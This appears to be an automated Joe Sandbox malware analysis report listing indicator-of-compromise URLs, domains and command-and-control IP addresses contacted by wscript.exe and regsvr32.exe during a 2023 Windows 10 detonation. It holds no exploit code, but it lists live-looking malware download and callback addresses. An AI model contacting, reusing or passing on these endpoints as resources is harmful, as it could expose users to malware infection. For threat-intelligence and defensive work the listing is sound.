https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | 0% | Avira URL Cloud | safe |
https://160.16.142.56:8080/M | 0% | Avira URL Cloud | safe |
https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/VnX | 100% | Avira URL Cloud | malware |
https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | 100% | Avira URL Cloud | malware |
https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/X | 100% | Avira URL Cloud | malware |
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/ | 100% | Avira URL Cloud | malware |
https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/bK | 100% | Avira URL Cloud | malware |
https://104.168.155.143:8080/Y | 100% | Avira URL Cloud | malware |
https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/z | 100% | Avira URL Cloud | malware |
https://163.44.196.120:8080/ | 100% | Avira URL Cloud | malware |
https://91.121.146.47:8080/ | 100% | Avira URL Cloud | malware |
https://www.gomespontes.com.br/logs/pd/vM | 100% | Avira URL Cloud | malware |
https://167.172.199.165:8080/l | 100% | Avira URL Cloud | malware |
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/cw34006 | 100% | Avira URL Cloud | malware |
https://167.172.199.165:8080/ | 100% | Avira URL Cloud | malware |
https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/dllgz | 100% | Avira URL Cloud | malware |
https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/ | 100% | Avira URL Cloud | malware |
https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | 100% | Avira URL Cloud | malware |
https://www.gomespontes.com.br/s | 0% | Avira URL Cloud | safe |
http://ozmeydan.com/cekici/9/ | 100% | Avira URL Cloud | malware |
https://164.90.222.65/) | 100% | Avira URL Cloud | malware |
https://www.gomespontes.com.br/logs/pd/ | 100% | Avira URL Cloud | malware |
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM | 100% | Avira URL Cloud | malware |
https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz// | 0% | Avira URL Cloud | safe |
https://penshorn.org/admin/Ses8712iGR8du/tM | 100% | Avira URL Cloud | malware |
https://104.168.155.143:8080/4 | 100% | Avira URL Cloud | malware |
https://www.gomespontes.com.br/ | 0% | Avira URL Cloud | safe |
https://164.90.222.65/wfqhlvcfruxkwghn/ivirkxueekmcz/ | 100% | Avira URL Cloud | malware |
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM | 100% | Avira URL Cloud | malware |
https://167.172.199.165:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | 100% | Avira URL Cloud | malware |
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/ | 100% | Avira URL Cloud | malware |
https://penshorn.org/admin/Ses8712iGR8du/ | 100% | Avira URL Cloud | malware |
http://softwareulike.com/cWIYxWMPkK/yM | 100% | Avira URL Cloud | malware |
https://104.168.155.143:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | 100% | Avira URL Cloud | malware |
https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/.DLL | 100% | Avira URL Cloud | malware |
http://ozmeydan.com/cekici/9/xM | 100% | Avira URL Cloud | malware |
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/dll | 100% | Avira URL Cloud | malware |
https://104.168.155.143:8080/P | 100% | Avira URL Cloud | malware |
https://www.gomespontes.com.br/logs/pd/l | 100% | Avira URL Cloud | malware |
https://104.168.155.143:8080/ | 100% | Avira URL Cloud | malware |
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/ | 100% | Avira URL Cloud | malware |
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM | 100% | Avira URL Cloud | malware |
https://160.16.142.56:8080/ | 0% | Avira URL Cloud | safe |
https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | 100% | Avira URL Cloud | malware |
https://penshorn.org/admin/Ses8712iGR8du/95DC4.tmp.dll( | 100% | Avira URL Cloud | malware |
https://www.gomespontes.com.br/logs/pd/0w | 100% | Avira URL Cloud | malware |
http://softwareulike.com/cWIYxWMPkK/_ | 100% | Avira URL Cloud | malware |
https://160.16.142.56:8080/) | 0% | Avira URL Cloud | safe |
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/476 | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bbvoyage.com | 31.31.196.172 | true | true | | unknown
gomespontes.com.br | 186.202.153.5 | true | true | | unknown
penshorn.org | 203.26.41.131 | true | true | | unknown
www.gomespontes.com.br | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/ | true | Avira URL Cloud: malware | unknown
https://www.gomespontes.com.br/logs/pd/ | true | Avira URL Cloud: malware | unknown
https://164.90.222.65/wfqhlvcfruxkwghn/ivirkxueekmcz/ | true | Avira URL Cloud: malware | unknown
https://penshorn.org/admin/Ses8712iGR8du/ | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/H#K#0 | wscript.exe, 00000001.00000003.1417301254.000002D845C83000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://wrappixels.co | wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://softwareulike.com/cWIYxWMPkK/ | wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://160.16.142.56:8080/M | regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D68000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/VnX | regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/X | regsvr32.exe, 00000004.00000003.1868438531.0000000000D08000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://104.168.155.143:8080/Y | regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/bK | regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://91.121.146.47:8080/ | regsvr32.exe, 00000004.00000002.2661608245.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://163.44.196.120:8080/ | regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/z | regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.gomespontes.com.br/logs/pd/vM | wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/cw34006 | wscript.exe, 00000001.00000003.1531992780.000002D8464BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552238532.000002D8464BB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://167.172.199.165:8080/l | regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://167.172.199.165:8080/ | regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/dllgz | regsvr32.exe, 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/ | regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.gomespontes.com.br/s | wscript.exe, 00000001.00000002.1554710807.000002D846747000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ozmeydan.com/cekici/9/ | wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D8466F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://164.90.222.65/) | regsvr32.exe, 00000004.00000003.2367342315.0000000000D51000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM | wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz// | regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://penshorn.org/admin/Ses8712iGR8du/tM | wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://104.168.155.143:8080/4 | regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.gomespontes.com.br/ | wscript.exe, 00000001.00000003.1537553114.000002D84656F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542696917.000002D846570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1540601110.000002D846570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1534710579.000002D846568000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1545756551.000002D846570000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM | wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/.DLL | regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/ | wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://softwareulike.com/cWIYxWMPkK/yM | wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://167.172.199.165:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://104.168.155.143:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | regsvr32.exe, 00000004.00000002.2661608245.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/dll | wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ozmeydan.com/cekici/9/xM | wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://104.168.155.143:8080/P | regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.gomespontes.com.br/logs/pd/l | wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://104.168.155.143:8080/ | regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/ | wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM | wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://160.16.142.56:8080/ | regsvr32.exe, 00000004.00000002.2661608245.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | regsvr32.exe, 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://penshorn.org/admin/Ses8712iGR8du/95DC4.tmp.dll( | wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.gomespontes.com.br/logs/pd/0w | wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D84672F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://softwareulike.com/cWIYxWMPkK/_ | wscript.exe, 00000001.00000003.1417301254.000002D845C83000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://160.16.142.56:8080/) | regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/476 | wscript.exe, 00000001.00000003.1531992780.000002D8464BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552238532.000002D8464BB000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
52.109.13.63 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
110.232.117.186 | unknown | Australia | 56038 | RACKCORP-APRackCorpAU | true
103.132.242.26 | unknown | India | 45117 | INPL-IN-APIshansNetworkIN | true
104.168.155.143 | unknown | United States | 54290 | HOSTWINDSUS | true
79.137.35.198 | unknown | France | 16276 | OVHFR | true
115.68.227.76 | unknown | Korea Republic of | 38700 | SMILESERV-AS-KRSMILESERVKR | true
163.44.196.120 | unknown | Singapore | 135161 | GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG | true
206.189.28.199 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
31.31.196.172 | bbvoyage.com | Russian Federation | 197695 | AS-REGRU | true
186.202.153.5 | gomespontes.com.br | Brazil | 27715 | LocawebServicosdeInternetSABR | true
203.26.41.131 | penshorn.org | Australia | 38719 | DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | true
107.170.39.149 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
66.228.32.31 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
197.242.150.244 | unknown | South Africa | 37611 | AfrihostZA | true
185.4.135.165 | unknown | Greece | 199246 | TOPHOSTGR | true
183.111.227.137 | unknown | Korea Republic of | 4766 | KIXS-AS-KRKoreaTelecomKR | true
45.176.232.124 | unknown | Colombia | 267869 | CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC | true
169.57.156.166 | unknown | United States | 36351 | SOFTLAYERUS | true
164.68.99.3 | unknown | Germany | 51167 | CONTABODE | true
139.59.126.41 | unknown | Singapore | 14061 | DIGITALOCEAN-ASNUS | true
167.172.253.162 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
167.172.199.165 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
202.129.205.3 | unknown | Thailand | 45328 | NIPA-AS-THNIPATECHNOLOGYCOLTDTH | true
147.139.166.154 | unknown | United States | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
153.92.5.27 | unknown | Germany | 47583 | AS-HOSTINGERLT | true
159.65.88.10 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
172.105.226.75 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
164.90.222.65 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
213.239.212.5 | unknown | Germany | 24940 | HETZNER-ASDE | true
5.135.159.50 | unknown | France | 16276 | OVHFR | true
186.194.240.217 | unknown | Brazil | 262733 | NetceteraTelecomunicacoesLtdaBR | true
119.59.103.152 | unknown | Thailand | 56067 | METRABYTE-TH453LadplacoutJorakhaebuaTH | true
159.89.202.34 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
91.121.146.47 | unknown | France | 16276 | OVHFR | true
160.16.142.56 | unknown | Japan | 9370 | SAKURA-BSAKURAInternetIncJP | true
201.94.166.162 | unknown | Brazil | 28573 | CLAROSABR | true
91.207.28.33 | unknown | Kyrgyzstan | 39819 | PROHOSTKG | true
103.75.201.2 | unknown | Thailand | 133496 | CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH | true
103.43.75.120 | unknown | Japan | 20473 | AS-CHOOPAUS | true
188.44.20.25 | unknown | Macedonia | 57374 | GIV-ASMK | true
45.235.8.30 | unknown | Brazil | 267405 | WIKINETTELECOMUNICACOESBR | true
153.126.146.25 | unknown | Japan | 7684 | SAKURA-ASAKURAInternetIncJP | true
72.15.201.15 | unknown | United States | 13649 | ASN-VINSUS | true
187.63.160.88 | unknown | Brazil | 28169 | BITCOMPROVEDORDESERVICOSDEINTERNETLTDABR | true
82.223.21.224 | unknown | Spain | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
173.212.193.249 | unknown | Germany | 51167 | CONTABODE | true
95.217.221.146 | unknown | Germany | 24940 | HETZNER-ASDE | true
149.56.131.28 | unknown | Canada | 16276 | OVHFR | true
182.162.143.56 | unknown | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | true
1.234.2.232 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
192.229.221.95 | unknown | United States | 15133 | EDGECASTUS | false
129.232.188.93 | unknown | South Africa | 37153 | xneeloZA | true
52.109.76.141 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
94.23.45.86 | unknown | France | 16276 | OVHFR | true
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 830321
Start date and time: 2023-03-20 09:06:00 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 52s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
Number of new started processes analysed: 6
